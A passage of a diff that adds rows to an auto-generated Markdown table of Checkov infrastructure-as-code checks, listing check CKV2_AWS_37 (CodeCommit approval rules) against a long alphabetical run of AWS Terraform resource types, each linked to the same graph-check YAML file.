+|  966 | CKV2_AWS_37              | resource                         | aws_backup_vault                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  967 | CKV2_AWS_37              | resource                         | aws_batch_compute_environment                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  968 | CKV2_AWS_37              | resource                         | aws_batch_job_definition                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  969 | CKV2_AWS_37              | resource                         | aws_batch_job_queue                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  970 | CKV2_AWS_37              | resource                         | aws_budgets_budget                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  971 | CKV2_AWS_37              | resource                         | aws_cloud9_environment_ec2                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  972 | CKV2_AWS_37              | resource                         | aws_cloudformation_stack                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  973 | CKV2_AWS_37              | resource                         | aws_cloudformation_stack_set                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  974 | CKV2_AWS_37              | resource                         | aws_cloudformation_stack_set_instance                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  975 | CKV2_AWS_37              | resource                         | aws_cloudfront_distribution                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  976 | CKV2_AWS_37              | resource                         | aws_cloudfront_origin_access_identity                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  977 | CKV2_AWS_37              | resource                         | aws_cloudfront_public_key                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  978 | CKV2_AWS_37              | resource                         | aws_cloudhsm_v2_cluster                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  979 | CKV2_AWS_37              | resource                         | aws_cloudhsm_v2_hsm                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  980 | CKV2_AWS_37              | resource                         | aws_cloudtrail                                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  981 | CKV2_AWS_37              | resource                         | aws_cloudwatch_dashboard                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  982 | CKV2_AWS_37              | resource                         | aws_cloudwatch_event_permission                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  983 | CKV2_AWS_37              | resource                         | aws_cloudwatch_event_rule                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  984 | CKV2_AWS_37              | resource                         | aws_cloudwatch_event_target                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  985 | CKV2_AWS_37              | resource                         | aws_cloudwatch_log_destination                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  986 | CKV2_AWS_37              | resource                         | aws_cloudwatch_log_destination_policy                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  987 | CKV2_AWS_37              | resource                         | aws_cloudwatch_log_group                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  988 | CKV2_AWS_37              | resource                         | aws_cloudwatch_log_metric_filter                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  989 | CKV2_AWS_37              | resource                         | aws_cloudwatch_log_resource_policy                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  990 | CKV2_AWS_37              | resource                         | aws_cloudwatch_log_stream                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  991 | CKV2_AWS_37              | resource                         | aws_cloudwatch_log_subscription_filter                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  992 | CKV2_AWS_37              | resource                         | aws_cloudwatch_metric_alarm                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  993 | CKV2_AWS_37              | resource                         | aws_codebuild_project                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  994 | CKV2_AWS_37              | resource                         | aws_codebuild_source_credential                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  995 | CKV2_AWS_37              | resource                         | aws_codebuild_webhook                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  996 | CKV2_AWS_37              | resource                         | aws_codecommit_repository                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  997 | CKV2_AWS_37              | resource                         | aws_codecommit_trigger                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  998 | CKV2_AWS_37              | resource                         | aws_codedeploy_app                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  999 | CKV2_AWS_37              | resource                         | aws_codedeploy_deployment_config                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1000 | CKV2_AWS_37              | resource                         | aws_codedeploy_deployment_group                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1001 | CKV2_AWS_37              | resource                         | aws_codepipeline                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1002 | CKV2_AWS_37              | resource                         | aws_codepipeline_webhook                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1003 | CKV2_AWS_37              | resource                         | aws_codestarnotifications_notification_rule                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1004 | CKV2_AWS_37              | resource                         | aws_cognito_identity_pool                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1005 | CKV2_AWS_37              | resource                         | aws_cognito_identity_pool_roles_attachment                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1006 | CKV2_AWS_37              | resource                         | aws_cognito_identity_provider                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1007 | CKV2_AWS_37              | resource                         | aws_cognito_resource_server                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1008 | CKV2_AWS_37              | resource                         | aws_cognito_user_group                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1009 | CKV2_AWS_37              | resource                         | aws_cognito_user_pool                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1010 | CKV2_AWS_37              | resource                         | aws_cognito_user_pool_client                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1011 | CKV2_AWS_37              | resource                         | aws_cognito_user_pool_domain                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1012 | CKV2_AWS_37              | resource                         | aws_config_aggregate_authorization                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1013 | CKV2_AWS_37              | resource                         | aws_config_config_rule                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1014 | CKV2_AWS_37              | resource                         | aws_config_configuration_aggregator                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1015 | CKV2_AWS_37              | resource                         | aws_config_configuration_recorder                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1016 | CKV2_AWS_37              | resource                         | aws_config_configuration_recorder_status                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1017 | CKV2_AWS_37              | resource                         | aws_config_delivery_channel                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1018 | CKV2_AWS_37              | resource                         | aws_config_organization_custom_rule                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1019 | CKV2_AWS_37              | resource                         | aws_config_organization_managed_rule                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1020 | CKV2_AWS_37              | resource                         | aws_cur_report_definition                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1021 | CKV2_AWS_37              | resource                         | aws_customer_gateway                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1022 | CKV2_AWS_37              | resource                         | aws_datapipeline_pipeline                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1023 | CKV2_AWS_37              | resource                         | aws_datasync_agent                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1024 | CKV2_AWS_37              | resource                         | aws_datasync_location_efs                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1025 | CKV2_AWS_37              | resource                         | aws_datasync_location_nfs                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1026 | CKV2_AWS_37              | resource                         | aws_datasync_location_s3                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1027 | CKV2_AWS_37              | resource                         | aws_datasync_location_smb                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1028 | CKV2_AWS_37              | resource                         | aws_datasync_task                                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1029 | CKV2_AWS_37              | resource                         | aws_dax_cluster                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1030 | CKV2_AWS_37              | resource                         | aws_dax_parameter_group                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1031 | CKV2_AWS_37              | resource                         | aws_dax_subnet_group                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1032 | CKV2_AWS_37              | resource                         | aws_db_cluster_snapshot                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1033 | CKV2_AWS_37              | resource                         | aws_db_event_subscription                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1034 | CKV2_AWS_37              | resource                         | aws_db_instance                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1035 | CKV2_AWS_37              | resource                         | aws_db_instance_role_association                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1036 | CKV2_AWS_37              | resource                         | aws_db_option_group                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1037 | CKV2_AWS_37              | resource                         | aws_db_parameter_group                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1038 | CKV2_AWS_37              | resource                         | aws_db_security_group                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1039 | CKV2_AWS_37              | resource                         | aws_db_snapshot                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1040 | CKV2_AWS_37              | resource                         | aws_db_subnet_group                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1041 | CKV2_AWS_37              | resource                         | aws_default_network_acl                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1042 | CKV2_AWS_37              | resource                         | aws_default_route_table                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1043 | CKV2_AWS_37              | resource                         | aws_default_security_group                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1044 | CKV2_AWS_37              | resource                         | aws_default_subnet                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1045 | CKV2_AWS_37              | resource                         | aws_default_vpc                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1046 | CKV2_AWS_37              | resource                         | aws_default_vpc_dhcp_options                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1047 | CKV2_AWS_37              | resource                         | aws_devicefarm_project                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1048 | CKV2_AWS_37              | resource                         | aws_directory_service_conditional_forwarder                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1049 | CKV2_AWS_37              | resource                         | aws_directory_service_directory                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1050 | CKV2_AWS_37              | resource                         | aws_directory_service_log_subscription                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1051 | CKV2_AWS_37              | resource                         | aws_dlm_lifecycle_policy                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1052 | CKV2_AWS_37              | resource                         | aws_dms_certificate                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1053 | CKV2_AWS_37              | resource                         | aws_dms_endpoint                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1054 | CKV2_AWS_37              | resource                         | aws_dms_event_subscription                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1055 | CKV2_AWS_37              | resource                         | aws_dms_replication_instance                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
